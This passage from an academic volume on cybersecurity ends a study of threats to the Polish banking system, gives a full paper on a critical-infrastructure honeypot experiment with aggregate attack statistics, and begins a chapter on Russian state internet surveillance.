PhD, DSc. It should be highlighted that the research carried out for the purposes of the
doctoral dissertation referred to the results of research and conclusions presented in the
report, with the difference, however, that the doctoral dissertation focused primarily on
issues related to cybersecurity of the entire banking system and its institutions to
demonstrate the importance of this matter for the security of the Republic of Poland.
Therefore, both studies have become complementary to each other – while clients were
placed in the centre of the report, the institutions included in the Polish banking system
were placed in the centre of the doctoral dissertation, considering their relations with the
regional and international banking system.
12
National Security Strategy of the Republic of Poland 2020,
https://www.bbn.gov.pl/ftp/dokumenty/Strategia_Bezpieczenstwa_Narodowego_RP_2020.pdf, Warsaw 2020,
[access: 29.08.2023].
13
Cybersecurity Strategy of the Republic of Poland for 2019-2024, https://www.gov.pl/attachment/c8189ba4-
2797-4cba-b00f-200dd10e9474, [access: 29.08.2023].
14
Act of 5 July 2018 on the National Cybersecurity System, Journal of Laws of 2018, item 1560.
15
Act of 26 April 2007 on Crisis Management, Journal of Laws of 2007, No. 89, item 590.
16
J. Kosiński, G. Krasnodębski, P. Ciszek, P. Wawrzyniak, Security Environment of Electronic Banking
Customers (Polish original: Środowisko bezpieczeństwa klientów bankowości elektronicznej), report
commissioned by the Analytical and Research Program of the Warsaw Institute of Banking Foundation,
Gdynia 2021.
48
STABILISING INSTITUTIONS
National Bank of Poland (NBP)
Central bank Polish Financial Supervision Authority (PFSA)
Supervisory authority Bank Guarantee Fund (BFG)
Deposit guarantor
• Constitution of the Republic of Poland
of April 2, 1997
• Act of 29 August 1997 on the National Bank
of Poland
• Act of August 29, 1997 - Banking Law
• Act of August 27, 2009 on Public Finance
• Act of 21 July 2006 on Financial Market
Supervision
• Act of 10 June 2016 on the Bank Guarantee
Fund, Deposit Guarantee Scheme
and Resolution
• Act of 15 April 2005 on the Supplementary
Supervision of Credit Institutions, Insurance
Undertakings, Reinsurance Undertakings
and Investment Firms in a Financial
Conglomerate
MARKET CREATING INSTITUTIONS
BANKING SECTOR
• Act of August 29, 1997 - Banking Law
• Act of August 29, 1997 on Covered Bonds
and Mortgage Banks
• Act of 14 March 2003 on National
Development Bank
• Act of September 16, 1982 - Cooperative
Law
• Act of 7 December 2000 on the Functioning
of Cooperative Banks, Their Association and
Associating Banks
COOPERATIVE SAVINGS and CREDIT UNIONS SECTOR
Non-bank deposit and credit institutions
• Act of November 5, 2009 on Cooperative
Savings and Credit Unions
• Act of September 16, 1982 - Cooperative
Law
Commercial (deposit and
loan) banks:
• Universal
• Specialised
National Cooperative
Savings and Credit Union
(Kasa Krajowa, Krajowa
SKOK, KSKOK)
Cooperative Savings and
Credit Unions (SKOK)
Public banks
(development):
• National Development
Bank (BGK)
Cooperative banks
(non-commercial deposit
and loan banks)
AUXILIARY INSTITUTIONS
NATIONAL LEVEL
• International Monetary Fund (IMF)
• World Bank (WB)
• European Bank for Reconstruction
and Development (EBRD)
• Bank for International Settlements (BRM)
• European Central Bank (ECB)
REGIONAL (European Union) AND INTERNATIONAL LEVEL
• European Commission (EC)
• European Insurance and Occupational
Pensions Authority (EIOPA)
• European Securities and Markets
Authority (ESMA)
• European Systemic Risk Board (ESRB)
European System of Central Banks (ESCB) European Banking Authority
(EBA)
Credit Information Bureau (BIK)
Polish Bank Association (ZBP)
National Depository for Securities (KDPW)
KDPW_CCP (Central Counterparty) clearing house
National Clearing House (KIR)
Payment card issuers
Insurance institutions
Economic Information Bureau InfoMonitor SA (BIG IM) and other offices of this type
Figure 1. The structure of the banking system in Poland, its main elements, mutual relations, and
legal regulations relevant to specific institutions
17
17
Source: Own elaboration.
49
An important research area was the analysis of the impact of digital
transformation on cybersecurity and cybercrime in relation to banking systems. For its
needs, a review of modern technologies in the area of interest of digital banking was
carried out, emphasising not only their advantages (seen through the prism of competitive
advantage on the market), but also challenges in the area of security. The classification of
entities that are sources of cyberthreats (cyberthreat actors) was also presented, drawing
attention to the problem of attribution, and underlining that the area of modern cybercrime
directed against banks (institutions) and their clients is undergoing digital transformation
(see Figure 2).
Figure 2. Cyberthreat actors and their primary motivations
18
The results of the survey confirmed the importance of the Polish banking
system as a target for cyberthreat actors in the event of a conflict implemented in
cyberspace (see Figure 3). During the discussions conducted as part of expert interviews,
the example of cyberattacks that took place in Estonia, in 2007, was often referred to –
their effects went beyond the state area, hitting the private sector, banks, and the
perpetrators managed to generate huge financial losses for business.
18
Based on: An introduction to the cyber threat environment,
https://www.cyber.gc.ca/en/guidance/introduction-cyber-threat-environment, [access: 29.08.2023].
50
Figure 3. Importance of the Polish banking system for entities that are sources of
cyberthreats (cyberthreat actors) in the event of a conflict implemented in cyberspace
The survey also showed that the greatest risk for the Polish banking system
is posed by nation-states, including state-sponsored cyberthreat actors, and organised
cybercriminal groups looking for profits (see Figure 4). This point of view was also shared
by most of the experts interviewed in a structured way, with the interviews establishing
that nation-states can offer cybercriminals not only legal protection, but also access to
financial capital, technical infrastructure, and advanced technologies. Thus, we are
dealing with a kind of combination of interests – between nation-states and organised
cybercriminal groups – which perfectly allows the perpetrators of attacks to hide their
identity, motivation, and purpose of actions. This makes the attribution of cyberattacks
problematic.
51
Figure 4. Cyberthreat actors that pose the greatest risk to the Polish banking system
The results of the survey showed that among the technologies related to the
digital transformation of banking, “cloud computing” poses the greatest threat in the area
of cybersecurity (see Figure 5). Throughout expert interviews, it was determined that the
risk associated with the loss of control over the data entrusted to the cloud service provider
is important here. Experts also emphasised the risk associated with the possibility of using
digital transformation technologies in the area of economic intelligence, industrial
espionage and to implement advanced social engineering attacks (e.g. based on imitation
– deep fake). The research has shown that “quantum computers” are not perceived as a
source of significant threats – in the research survey they took the penultimate place, and
during expert interviews this topic was not widely commented. The reason for this
perception may be the fact that it is still a very new and sophisticated technology. During
the research, it was not possible to clearly determine the reason for this situation – perhaps
this thread should be analysed more thoroughly using a dedicated study.
At the same time, during expert interviews, it was established that the
ongoing digital transformation should not be stopped, bearing in mind the fact that the
same technologies are used by cybercriminals. It is crucial to precede the implementation
of each technology with an in-depth risk analysis – because any changes carry risks that
should be identified, estimated, and then minimised or accepted before the decision to
implement a given solution.
52
Figure 5. Digital banking technologies that pose the greatest threat in the area of
cybersecurity
In addition, research survey and expert interviews – in relation to the
specific problems defined – established that:
− Stabilising institutions (NBP, PFSA, BFG) are of the greatest importance for the
security of the Republic of Poland (60% of respondents), market creating
institutions such as commercial banks, BGK (National Development Bank),
cooperative banks and credit unions are also important (30% of respondents).
− For modern banking systems, the most important threats are related to the area
of cyberspace. A clear trend is the commercialisation and professionalisation of
cybercriminal services.
− Social engineering occupies an important place in the arsenal of cybercriminals
– the following should be underlined: attacks on customers and banking
employees (e.g. phishing or Business Email Compromise, BEC); disinformation
campaigns that can be aimed at the state’s financial system and influence based
on imitation (deep fake).
− Not only banking systems are undergoing digital transformation, but also the
entire area of critical infrastructure – this opens new opportunities in the field of
cybersecurity and cybercrime. The phenomenon of a kind of “armaments race”
is noticeable here – where cybercriminals are not limited by legal regulations or
even ethical standards.
53
− A cyberattack on Polish banking system can have an effect on other areas – e.g.
the corporate sector, critical infrastructure systems, regional or international
banking system. This indicates that capacity should be developed through
interinstitutional and cross-sectoral collaboration, incorporating international
level. This is important because the instability of the Polish banking system may
have regional and international consequences, including social, economic, and
political costs.
− Regarding strategic documents – the objectives set out therein must result from
a risk analysis that will indicate priority actions from the point of view of the
security of the Republic of Poland.
− The degree of achievement of defined strategic objectives should be measured
(e.g. through Key Performance Indicators, KPIs) – only measurement gives the
opportunity to assess to what extent the objectives set out in the strategic
documents are achieved and whether corrective actions are needed.
It is worth highlighting that strategic documents and regulations must be an
expression of political will. Any changes thereto should result from the recognition of the
security environment of the Republic of Poland (where risk analysis is crucial), actual
needs (expressed by strategic objectives) and have a chance to be implemented (i.e. meet
the feasibility and measurability criteria).
Conclusions The conducted research allowed to draw several conclusions – it is worth
recalling the most important of them.
• Firstly, in the context of the digital transformation of the banking system, threats in
cyberspace, including the full range of means of influence used in hybrid warfare,
have a significant impact on the security of the Republic of Poland.
• Secondly, the foundations of digital transformation are modern technologies that are
used both by banks wanting to secure a competitive advantage and by
cybercriminals.
• Thirdly, the greatest risk for the Polish banking system is posed by nation-states
(having geopolitical or political motivation) and organised cybercriminal groups
(having financial motivation) that can cooperate.
• Fourthly, the impact in cyberspace is a temptation, because from the cyberthreat
actors’ point of view, it is associated with a low risk of detecting the perpetrator,
with a relatively high guarantee of success (the problem of attribution and
determination of actual motivation exposes here).
• Fifthly, the destabilisation of the financial system may lead to further consequences
and escalation of effects, including riots and acts of social revolt resulting from
dissatisfaction and loss of confidence in the state as the guarantor of citizens’
financial security. Ultimately, such an impact may cause a deep political crisis in the
country, which will significantly reduce its position on the international arena in
virtually every aspect of its functioning: political, social, economic, and even
military.
• Sixthly, education should shape the resilience of citizens and institutions to
contemporary threats related to digital transformation (establishment of appropriate
security culture is necessary).
54
• Seventhly, the key capability in the area of cybersecurity of the Polish banking
system is coordination of activities, as well as interinstitutional and cross-sectoral
cooperation, also in the international dimension.
• Eighthly, military and civilian cooperation should be strengthened in order to
develop a set of combined military and non-military methods of counter-impact in
cyberspace.
The collected research material allows us to draw the final conclusion that
the cybersecurity of the banking system is bind with and, therefore, has a significant
impact on the security of the Republic of Poland – this means that ensuring the security
of the Polish banking system in cyberspace is in the interest of the state, because a stable
financial system is a prerequisite for the implementation of any political or strategic
initiatives.
Summary It should be clearly emphasised that financial institutions, including banks,
should not be overly afraid and block the progressing digitalisation. However, this process
must take place in a supervised manner, based on risk analysis and under the control of
relevant state institutions (e.g. the Polish Financial Supervision Authority, PFSA –
Komisja Nadzoru Finansowego, KNF).
An important issue is the awareness of the impact that digital
transformation has on the security of the Republic of Poland, and even regional and
international security – especially in the context of hybrid activities, also carried out in
cyberspace, the aim of which does not have to be war. Hybrid activities may be only one
method of exerting political pressure or achieving a competitive advantage between states.
For this reason, we should not ask whether Polish banking system needs to be afraid of
hybrid activities and related operations carried out in cyberspace but assume that such
threats should be analysed on an ongoing basis as part of risk management processes.
To sum up, in the course of the research, the defined detailed problems and
the main research problem were solved, and the research goal of the dissertation was
achieved.
Bibliography
1) Act of 26 April 2007 on Crisis Management, Journal of Laws of 2007, No. 89, item
590.
2) Act of 29 August 1997 – Banking Law, Journal of Laws of 1997, No. 140, item
939.
3) Act of 5 July 2018 on the National Cybersecurity System, Journal of Laws of 2018,
item 1560.
4) An introduction to the cyber threat environment,
https://www.cyber.gc.ca/en/guidance/introduction-cyber-threat-environment,
[access: 29.08.2023].
5) Apanowicz J., Metodologia ogólna, Gdynia 2002.
6) Cybersecurity Strategy of the Republic of Poland for 2019-2024,
https://www.gov.pl/attachment/c8189ba4-2797-4cba-b00f-200dd10e9474, [access:
29.08.2023].
55
7) Hybrid war – hybrid response?,
https://www.nato.int/docu/review/pl/articles/2014/07/01/hybrydowa-wojna-
hybrydowa-reakcja/index.html, [access: 29.08.2023].
8) Kosiński B., Nowak A. Z., Karkowska R., Winkler-Drews T., Podstawy
współczesnej bankowości, Warszawa 2017.
9) Kosiński J., Krasnodębski G., Ciszek P., Wawrzyniak P., Security Environment of
Electronic Banking Customers (Polish original: Środowisko bezpieczeństwa
klientów bankowości elektronicznej), report commissioned by the Analytical and
Research Program of the Warsaw Institute of Banking Foundation, Gdynia 2021.
10) Letter of ZBP dated 29 September 2020 to the Minister of Digital Affairs,
https://mc.bip.gov.pl/fobjects/download/863075/uwagi-zbp-pdf.html, [access:
29.08.2023].
11) National Security Strategy of the Republic of Poland 2020,
https://www.bbn.gov.pl/ftp/dokumenty/Strategia_Bezpieczenstwa_Narodowego_R
P_2020.pdf, Warsaw 2020, [access: 29.08.2023].
56
WYBRANE ZAGROŻENIA CYBERBEZPIECZEŃSTWA INFRASTRUKTURY
KRYTYCZNEJ
SELECTED CYBER SECURITY THREATS TO CRITICAL INFRASTRUCTURE
Tomasz JANCZEWSKI
Akademia Marynarki Wojennej
Streszczenie
Infrastruktura krytyczna jest w ciągłym zainteresowaniu zarówno grup APT jak i
cyberprzestępców, przykładem udanego ataku na obiekt krytyczny z punktu widzenia
państwa jest przeprowadzony w lutym 2020 roku cyberatak na tłocznię gazu w USA [3].
Na podstawie ataku można przeprowadzić analizę czy w Polsce również udałby się
podobny atak z równie istotnymi skutkami – pozbawieniem kontroli nad urządzeniami
przez 48 godzin.
Słowa kluczowe: cyberbezpieczeństwo, infrastruktura krytyczna, bezpieczeństwo,
łańcuch dostaw, analiza bezpieczeństwa cyberprzestrzeni
Summary
Cyber attacks are commonly encountered incidents in computer networks. Based on
statistical data, critical infrastructure can be identified as one of the most important
elements of the modern country lifesystem. In this article, the author wonders about the
possibility of launching a ransomeware cyber-attack on port infrastructure based on a
similar attack carried out on a gas compressor station in the USA in February 2020.
Keywords: cybersecurity, critical infrastructure, security, supply chain, cybersecurity
analysis
Wprowadzenie - wymagania formalne
Infrastruktura krytyczna jest istotną częścią istnienia oraz funkcjonowania kraju.
Jest ona w ciągłym zainteresowaniu grup APT (ang. Advanced Persistent Threat) jak i
„zwykłych” cyberprzestępców[5]. Obiekty infrastruktury krytycznej są narażone na
ataki cybernetyczne – zwłaszcza ataki phishing'owe oraz typu ransomeware [3]. Jednak
nie są to jedyne sposoby ataków, które są przeprowadzanie w cyberprzestrzeni. Artykuł
ten przedstawia wyniki badań nad aktywnością cyberprzestępców w Internecie
przeprowadzonych przy pomocy Honeypot udającego obiekt infrastruktury krytycznej w
celu zbadania sposobów przeprowadzania cyberataków oraz jak największej ilości
danych dotyczących osób / grup przeprowadzających tego typu działania.
W trakcie badania przez okres dziesięciu miesięcy uruchomiony został w
cyberprzestrzeni Honeypot udający panel sterowania infrastrukturą krytyczną w postaci
panelu WWW przepompowni gazu, który nie miał połączenia z żadną krytyczną częścią
infrastruktury transportu gazu a jedynie udawał takowy.
57
Przegląd literatury związanej z zagrożeniami cyberbezpieczeństwa
Nie istnieje jedna spójna definicja cyberataku, jednak na potrzeby rozróżnienia
typu popełnionego przestępstwa oraz rodzaju użytego narzędzia środowisko związane z
IT doraźnie określa cyberataki jako ataki dokonane za pomocą urządzeń komputerowych
podłączonych do sieci komputerowej. Definicja ta jest na tyle szeroka by obejmować
zarówno komputery typu laptop poprzez mikrokomputery typu Raspberry Pi, urządzenia
IoT kończąc na komputerach typu Serwer cechą wspólna współczesnych cyberataków
wydaje się być komunikacja w oparciu o sieci teleinformatyczne.
NASK (Naukowa Akademicka Sieć Komputerowa) publikuje coroczne sprawozdanie
dotyczące rodzaju wykrytych ataków cybernetycznych w polskiej części Internetu.
Tabela 1 przedstawia zestawienie incydentów obsłużonych przez CERT Polska
w 2018 roku. Najwięcej incydentów bezpieczeństwa związanych jest odpowiednio z
Oszustwami komputerowymi oraz Phishing’iem rozumianym jako – podszywanie się pod
inną osobę lub organizację w celu wyłudzenia informacji np. danych do logowania,
certyfikatów itp. Kolejnym w kolejności są ataki związane z szeroko rozumianym
Złośliwym oprogramowaniem – aż 862 incydenty w 2018 roku. Dane z agregowane
wskazują jednoznacznie, iż przestępcy wykorzystują komputery jako medium do
popełniania znanych już wcześniej przestępstw – oszustwa oraz wprowadzanie w błąd
ofiary – Phishing. Jednak na zwrócenie uwagi zasługuje fakt pojawienia się incydentów
związanych z wykorzystywaniem znanych luk systemowych oraz próby nieuprawionego
logowania, które są nakierowane typowo na systemy komputerowe same w sobie.
Tabela 1: Incydenty obsłużone przez CERT Polska w 2018 r. według typów. Źródło [1]
Typ incydentu
Ilość
Spam
419
Złośliwe oprogramowanie
862
Wirus
4
Koń trojański
117
Gromadzenie informacji
101
Inżynieria społeczna
7
Próby włamań
153
Wykorzystanie znanych luk systemowych
30
Próby nieuprawnionego logowania
37
Włamania
137
DoS i DDoS
42
Oszustwa komputerowe
1878
Phishing
1655
Niesklasyfikowane
~ 1200
Na zwrócenie uwagi zasługuje fakt, że przedsiębiorstwa i instytucje objęte
krajowym systemem cyberbezpieczeństwa nie muszę zgłaszać wszystkich rodzajów
incydentów jakie występują w ich infrastrukturze stąd też wyniki za 2018 rok mogą być
znacznie zaniżone.
Jednak ustawodawca wymaga by podmioty zgłaszały następujące rodzaje
incydentów cyberbezpieczeństwa:
• Incydent poważny - incydent, który powoduje lub może spowodować znaczne
obniżenie jakości lub przerwanie ciągłości świadczenia usługi kluczowej; progi
58
uznania incydentu za poważny określa Rozporządzenie Rady Ministrów z 31
października 2018 roku w sprawie progów uznania incydentu za poważny [1]
• Incydent istotny - incydent mający istotny wpływ na świadczenie usługi
cyfrowej, zgodnie z kryteriami rozporządzenia wykonawczego Komisji
Europejskiej nr 2018/ 151 z 30 stycznia 2018 roku [1]
• Incydent w podmiocie publicznym - incydent, który powoduje lub może
spowodować obniżenie jakości lub przerwanie realizacji zadania publicznego.
[1] Incydenty muszą być zgłaszane do Zespołów Reagowania na Incydenty
Bezpieczeństwa Komputerowego (skr. CSIRT). W Polsce istnieją następujące Zespoły
reagowania na incydenty bezpieczeństwa komputerowego na poziomie ogólnokrajowym
• CSIRT prowadzony przez NASK PIB – CSIRT NASK
• CSIRT prowadzony przez Agencję Bezpieczeństwa Wewnętrznego – CSIRT
GOV
• CSIRT prowadzony przez Ministerstwo Obrony Narodowej – CSIRT MON
Każdy z wyżej wymienionych zespołów ma inny zakres odpowiedzialności,
przez co monitoruje inny rodzaj infrastruktury krajowej.
Tabela 2: Zakresy odpowiedzialności CSIRT
Nazwa CSIRT
Opis odpowiedzialności
CSIRT MON
Obsługa oraz koordynacja incydentów w jednostkach
podległych Ministerstwu Obrony Narodowej oraz
przedsiębiorstw o znaczeniu obronnym.
CSIRT GOV
Obsługa oraz koordynacja incydentów w jednostkach
związanych z Administracją Rządową, NBP, BGK oraz
infrastrukturą krytyczną w funkcjonowaniu Państwa.
CSIRT NASK
Obsługa oraz koordynacja incydentów we wszystkich
pozostałych podmiotach w tym zgłaszanych przez obywateli.
CSIRT działa na poziomie krajowym i wspiera zarządzaniem oraz
rozwiązywaniem incydentów, jednak czym naprawdę jest cyberatak? Nie ma jednej
definicji co możemy nazwać cyberatakiem czy też cyberincydentem jednak istnieje
szereg narzędzi pomocnych w określeniu jego istoty. Jednym z takich narzędzi jest
Lockheed Martin Cyber Kill Chain [2].
Według tej metodyki atak cybernetyczny jest serią czynności, którą musi
wykonać podmiot atakujący by osiągnąć zamierzony cel. W zależności od atakowanej
infrastruktury oraz założonego celu etapy ataku cybernetycznego mogą mieć
zróżnicowany okres trwania, jednak zawsze występują w odpowiedniej kolejności.
Etapy cyberataku według Lockheed Martin Cyber Kill Chain Methodology:
1. Rekonesans
2. Weaponization
3. Delivery
4. Exploitation
5. Installation
6. Command & Control
59
Metodyka Cyber Kill Chain idealnie nadaje się do analizowania
potencjalnych cyberataków na istotne elementy infrastruktury krytycznej zwłaszcza w
połączeniu z użyciem automatycznych systemów analizowania aktywności
cyberprzestępczej typu Honeypot [6]. W ramach systemu Honeypot analizowany jest
każdy etap ataku oraz sprawdzane są dodatkowe dane przesyłane przez przestępców jak
adresy IP, metadane przesłanych żądań czy lokalizacja adresu IP [7].
Opis środowiska testowego
W ramach przeprowadzonych badań przez 9 miesięcy uruchomiony był
Honeypot na infrastrukturze wirtualnego serwera prywatnego (ang. VPN) wykupionej u
dostawcy usług hostingowych. Server VPN posiadał następujące parametry:
• zewnętrzny adres IP (publiczny adres IP)
• 8 GB pamięci RAM
• 500 GM przestrzeni dyskowej
• procesor 8 vCore
• przepustowość 2 Gbps
W ramach serwera zainstalowany został system operacyjny Debian 11 oraz
system Honeypot – T-Pot. System Honeypot T-Pot to platforma scalająca w jeden system
dwadzieścia różnego rodzaju systemów Honeypot takich jak dionaea, cowrite, hellpot, …
w celu zapewnienie pełnej możliwości analizowana aktywności zarówno grup APT jak i
hacker’ów w atakowanym systemie [7].
W ramach dostosowywania T-Pot na potrzeby eksperymentu dodano ekran
logowania wyglądem przypominający ekrany sterowania komponentami infrastruktury
krytycznej.
Wyniki eksperymentu
W ramach eksperymentu zidentyfikowano 925,464 próby ataku na udawaną
infrastrukturę krytyczną – Rysunek 1.
Rysunek 1: Ilość ataków zidentyfikowanych w ramach uruchomionego systemu Honeypot.
Rysunek 1 przedstawia całkowitą ilość zidentyfikowanych ataków w
porównaniu z ilością unikalnych adresów IP, z których dane ataki były przeprowadzane.
Dane o unikalnej ilości adresów IP mogą świadczyć o szacowanej ilości aktorów
biorących udział w aktywnych działaniach cyberprzestępczych przy czym należy zwrócić
uwagę, że dany aktor może używać więcej niż jednego unikalnego adresu IP.
60
Rysunek 2: Klasyfikacja ataków ze względu na kraj atakującego.
Rysunek 2 przedstawia klasyfikację unikalnych adresów IP z których
pochodziły ataki względem kraju do którego dany adres IP można przypisać. W ramach
eksperymentu można zauważyć dużą liczbę adresów IP z krajów takich jak Francja,
Filipiny czy Indie autor skłania się ku przypuszczeniu, że jest to związane z centrami
przetwarzania danych takimi jak prywatna firma OVH, w których to można wykupić
własny server VPS i z niego przeprowadzać aktywność cyberprzestępczą. Jednak teza ta
powinna być zweryfikowania oddzielnymi badaniami.
Rysunek 3: Klasyfikacja ataków ze względu na atakowany port.
Rysunek 3 przedstawia klasyfikację ataków ze względu na atakowany port.
W tym przypadku widać korelację pomiędzy portami a wykrytymi podatnościami CVE.
61
W badanym okresie jedną z odkrytych podatności jest - CVE 2022 24500 (Windows SMB
Remote Code Execution Vulnerability) związaną z portem 445 i mającą potencjał
zdalnego wykonania kodu na atakowanym serwerze.
Rysunek 4: Klasyfikacja ataków z podziałem na identyfikację sprawcy.
Rysunek 4 przedstawia klasyfikację odnotowanych ataków w kontekście
zidentyfikowanych źródeł ataku. Identyfikacja IP pochodzi z różnych źródeł
współpracujących z Honepot T-Pot i opiera się na stronach aktywnie poszukujących
korelacji pomiędzy adresami IP a atakami wychodzącymi z nich. Z diagramu
przedstawionego na Rysunku 4 można wnioskować, że większość obserwowanych
ataków pochodziła od znanych w świecie cyberprzestępczych aktorów nie będących
atraumatycznymi skryptami typu Bot.
Wnioski
Na podstawie przeprowadzonego eksperymentu można wnioskować, iż
niezabezpieczona ze strony cyberprzestrzeni i wystawiona jako publiczny adres IP
infrastruktura krytyczna zostanie zaatakowana. Zarówno ilość ataków jak i liczba
unikalnych adresów IP z których obserwowane ataki pochodzą wskazuje na pewność
zetknięcia się panelów sterowania infrastruktury krytycznej z aktywnością
cyberprzestępczną. Dyslokacja geograficzna ataków nie wskazuje, by konkretne rejony
świata były bardziej aktywne w atakowaniu infrastruktury krytycznej niż inne. Co
powoduje konieczność stosowania innych rodzajów zabezpieczeń niż oparte o
geolokalizację. Aktywność cyberprzestępców skłania się bardziej do sprawdzania
podatności opublikowanych jako raporty CVE niż dokonywania autorskich ataków na
dany podmiot. Wynika to zapewne z bariery jaką stanowi znajdowanie podatności typu
0-day w kontekście łatwości użycia już znalezionych i opisanych podatności. Taki sposób
działania przestępców prowadzi do wniosku, że każda sensownie rozłożona procedura
ochrony obiektu krytycznego ze strony cyberprzestrzeni powinna uwzględniać cykliczny
możliwie jak najczęstszy przegląd nowo opublikowanych podatności CVE wraz ze
wskazówkami jak je wykrywać i naprawiać w danym konkretnym systemie. Klasyfikacja
62
ataków względem zidentyfikowanych adresów IP, z których przeprowadzana jest
przestępcza aktywność wskazuje na sens stosowania środków zabezpieczeń opartych o
filtrowanie niebezpiecznych adresów IP. W myśl zasady raz zidentyfikowana informacja
o adresie IP przeprowadzającym atak na dany obiekt może być propagowana na wszystkie
inne systemy infrastruktury krytycznej w celu zabezpieczenia czasowego ochranianych
systemów.
Bibliografia
1. Praca Zbiorowa pod kierownictwem Przemysława Jaroszewskiego: Krajobraz
bezpieczeństwa polskiego Internetu Raport roczny z działalności CERT Polska
NASK. 2018
2. Gaining the Advantage - Applying Cyber Kill Chain Methodology to Network
Defense. Lockheed Martin Corporation 2015.
3. Kopalniawiedzy.pl Ransomware sparaliżowało tłocznię gazu.
https://kopalniawiedzy.pl/ransomware-tlocznia-gazu-cyberatak,31568
21/02/2020
4. telekom-security / tpotce https://github.com/telekom-security/tpotce
5. Nguyen Vuong Tuan Hiep, Tisenko Victor Nikolaevich, Do Minh Tuan, Nguyen
The Lam, Nguyen Anh Tuan; Detecting Botnet based on Network Traffic;
International Journal of Advanced Trends in Computer Science and
Engineering;Volume 9 No.3, May - June 2020
6. Olivier Thonnard, Jouni Viinikka, Corrado Leita, Marc Dacier; Automating the
Analysis of Honeypot Data; France Telecom R&D
7. Vivekanand Rajbhar; Intrusion detection and prevention using Honeypot;
International Journal of Advanced Research in Computer Science;Volume 9, No.
4, July – August 2018
63
PAŃSTWOWY NADZÓR NAD INTERNETEM W ROSJI
STATE SURVEILLANCE OF THE INTERNET IN RUSSIA
Krystian WOJCIECHOWSKI
CTB AGH w Krakowie
Biegły sądowy SO w Gdańsku
Streszczenie
W rozdziale opisano, wybrane metody i narzędzia techniczne stosowane przez władze
Rosji do kontroli i nadzoru cyberprzestrzeni. Autor opierając się na niezależnych i
oficjalnych źródłach rosyjskich oraz zachodnich opisał proces kształtowania narzędzi
nadzoru nad Internetem, ze szczególnym uwzględnieniem mediów społecznościowych
oraz kierunki i próby powiązania narzędzi takich jak elementy smart city i cyfrowego
państwa w jednolity model kontroli zachowania społeczeństwa poprzez odcięcie od treści
uważanych za szkodliwe.
Słowa kluczowe: cyberbezpieczeństwo, osint, analiza informacji, runet, inwigilacja,
kontrola społeczeństwa
Summary
The chapter describes, selected methods and technical tools used by the Russian
government to control and supervise cyberspace. Drawing on independent and official
Russian and Western sources, the author described the process of shaping Internet
surveillance tools, with a particular focus on social media, as well as directions and
attempts to link tools such as smart city and digital state elements into a unified model for
controlling public behavior by cutting off content deemed harmful.
Keywords: cybersecurity, osint, intelligence analysis, runet, surveillance, public control
Wstęp Według publikowanego przez organizacje Freedom House corocznego
raportu „Freedom on the Net” rosyjskiego internetu w żaden sposób nie można uznać za
przestrzeń wolności.
1
Organizacja ocenia według tych samych kryteriów stopień
demokracji oraz swobodę w sieci. Ocenie poddawanych jest siedemdziesiąt krajów. W
przypadku internetu ocena dokonywana jest w trzech obszarach: „Przeszkody w dostępie
do sieci”, „Ograniczenia w dostępie do treści” i „Naruszenia praw użytkowników”.
Wszystkie trzy obszary są punktowane a suma punktów przy najbardziej wolnym
dostępie do sieci wynosi 100, przy czym uważa się, że kraj, który otrzyma do 39 punktów
nie gwarantuje wolności sieci. Metodologia badania wolności sieci ocenia także trendy
pojawiające się w danym kraju. Badanie zawsze dotyczy sytuacji w roku poprzedzającym
raport. W tegorocznym „Freedom of the Net 2023” Rosja otrzymała 23 punkty, o dwa
1
https://freedomhouse.org/country/russia/freedom-net/2023
64
mniej niż w roku poprzednim. Oznacza to, że trend ograniczania wolności w sieci
postępuje. Stosunkowo najwięcej punktów Rosja otrzymała w pierwszej kategorii
„Obstacles to Access”, tutaj na 25 możliwych punktów przyznano 10. Raport organizacji
wskazuje stosunkowo dobry dostęp Rosjan do sieci. Internet bywa drogi ale ponad 80
procent gospodarstw domowych ma dostęp do sieci o średniej prędkości na poziomie
79,93 Mbps. Dostęp do mobilnego internetu trzeciej lub czwartej generacji ma 88,7
procent mieszkańców. Raport szczegółowo opisuje sposób oceny każdej kategorii, ale dla
naszego artykułu najważniejsze są dane o dostępie do sieci. W pozostałych dwóch
kategoriach „Limits on Content” i „Violations of User Rights” przyznano odpowiednio 5
na 35 możliwych i 6 na 40 możliwych punktów. W dalszej części artykułu postaram się
przybliżyć kilka przykładów ograniczeń i kontroli sieci w Rosji.
Definicja rosyjskiego internetu
Rosyjski internet zwykle nazywany jest „Runetem”. Określenie to
powstało w Rosji z chęcią podkreślenia odrębności tego segmentu globalnej sieci. W
pierwszych latach funkcjonowania globalnej sieci była to głownie odrębność językowa,
powoli i raczej ewolucyjnie wykształcały się specyficzne dla Rosji serwisy i usługi.
Rosjanie lubią korzystać z narzędzi wytworzonych w ich kraju, stąd tez np. ogromna
popularność lokalnych wersji serwisów społecznościowych takich jak „V kontakte” czy
„Odnoklassniki”, które na przynajmniej na początku przypominały klony zachodnich
serwisów, ale np. dodawały specyficznie rosyjskie rozwiązania jak chociażby możliwość
publikowania całych dużych plików filmowych, w tym prackich kopii etc.
Według polskiej Wikipedii Runet to tylko określenie rosyjskojęzycznej
części Internetu w Rosji. Jednak, gdy popatrzymy za to samo hasło w rosyjskiej wersji,
że definicja jest znacznie szersza bo za Runet przyjmuje ona wszystkie strony internetowe
z zawartością w języku rosyjskim. Według hasła w Wikipedii, Runet „chociaż głównie
skoncentrowany jest w Rosji i na Ukrainie oraz w pozostałych krajach poradzieckich to
rozpowszechnił się na wszystkich kontynentach włącznie z Antarktydą”
2
. Językowe
podejście do sieci charakteryzuje rosyjskie rozumienie internetu, oznacza to znacznie
rozszerzenie zasięgu działania regulatorów i cenzury państwowej. Państwo rosyjskie
chciałoby kontrolować każdą stronę i serwis, w którym znajdują się treści w języku
rosyjskim. W pierwszych latach istnienia sieci uważano ją za sferę wolności. Na
przełomie wieków Internet by dostępny w zasadzie tylko w dużych miastach. Władze
zadawały się nie ingerować w funkcjonowanie nowego medium. Jak później okazało była
to pozorna obojętność. Zmiana nadeszła wraz z pojawieniem się mediów
społecznościowych. A w zasadzie po tym, jak w latach 2011-12 masowe protesty zaczęły
być koordynowane online. Wtedy zapadła decyzja co do zaostrzenia kontroli Internetu.
Pojawiły się nowe przepisy pozwalające blokować strony internetowe; inne nakazywały
operatorom telefonii komórkowej i dostawcom Internetu przechowywać zapisy połączeń
i wiadomości, udostępniając w razie potrzeby informacje służbom bezpieczeństwa.
Wzrastała rola kontrolna i nadzorcza Federalnej Służby Bezpieczeństwa. Władze
bezskutecznie naciskały na firmy takie jak Google, Apple i Facebook, aby
przechowywały dane użytkowników na rosyjskich serwerach i w końcu ogłosiły plany
budowy "suwerennego Internetu", który mógłby zostać odcięty od reszty świata. Wielu
2
